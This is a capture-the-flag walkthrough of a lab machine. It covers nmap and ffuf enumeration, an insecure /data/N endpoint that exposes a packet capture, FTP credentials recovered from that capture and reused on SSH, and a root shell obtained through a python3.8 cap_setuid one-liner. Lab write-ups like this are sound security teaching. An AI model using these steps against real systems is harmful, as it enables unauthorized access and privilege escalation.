Enumeration
Defining a helper variable containing the IP and doing some basic enumeration:
export ip=10.10.10.245
ping $ip # TTL 63 - linux?
nmap -sC -sV $ip
| Port | Service | Notes |
|---|---|---|
| 21 | ftp | vsftpd 3.0.3 |
| 22 | ssh | OpenSSH 8.2p1 Ubuntu protocol 2.0 |
| 80 | http | gunicorn |
http
The service on port 80 shows a dashboard when looked at in the browser. Enumerating with ffuf:
for i in {0..10000}; do echo $i >> /tmp/numbers; done
ffuf -w /usr/share/wordlists/wfuzz/general/big.txt -u http://10.10.10.245/FUZZ # finds /data
ffuf -w /usr/share/wordlists/wfuzz/general/big.txt -u http://10.10.10.245/data/FUZZ # returns lots of 302s
ffuf -w /usr/share/wordlists/wfuzz/general/big.txt -u http://10.10.10.245/data/FUZZ -fc 302 # finds 01,0,2,000000,00,02,1,00000000
for i in {0..10000}; do echo $i >> /tmp/numbers; done
ffuf -w /tmp/numbers -u http://10.10.10.245/data/FUZZ -fc 302
# finds 0,1,2
/data/0 when opened confirms its an interesting result as it appears to be a packet capture of 72 packets in total that can be downloaded. Download and opening the file with wireshark shows the captured packets.
220 (vsFTPd 3.0.3)
USER nathan
331 Please specify the password.
PASS Buck3tH4TF0RM3!
230 Login successful.
SYST
215 UNIX Type: L8
PORT 192,168,196,1,212,140
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
226 Directory send OK.
PORT 192,168,196,1,212,141
200 PORT command successful. Consider using PASV.
LIST -al
150 Here comes the directory listing.
226 Directory send OK.
TYPE I
200 Switching to Binary mode.
PORT 192,168,196,1,212,143
200 PORT command successful. Consider using PASV.
RETR notes.txt
550 Failed to open file.
QUIT
221 Goodbye.
The recovered credentials are user: nathan, Pass: Buck3tH4TF0RM3!.
FTP
The captured credentials can be used to login to the ftp service:
ftp $ip
# nathan
# Buck3tH4TF0RM3!
ls
get user.txt
SSH
testing for credential reuse of the ftp password on ssh
ssh nathan@$ip
# Buck3tH4TF0RM3!
This gets a shell
Privilege Escalation
Enumerate for potential ways to escalate privileges:
scp /opt/linpeas/linpeas.sh nathan@$ip:/tmp/linpeas.sh
# Buck3tH4TF0RM3!
ssh nathan@$ip
# Buck3tH4TF0RM3!
cd /tmp
linpeas.sh
less -r o
# Capabilities
# /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
Execute a paylaod using python to change the uid through cap_setuid
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash");'
whoami
# root
cat /root/root.txt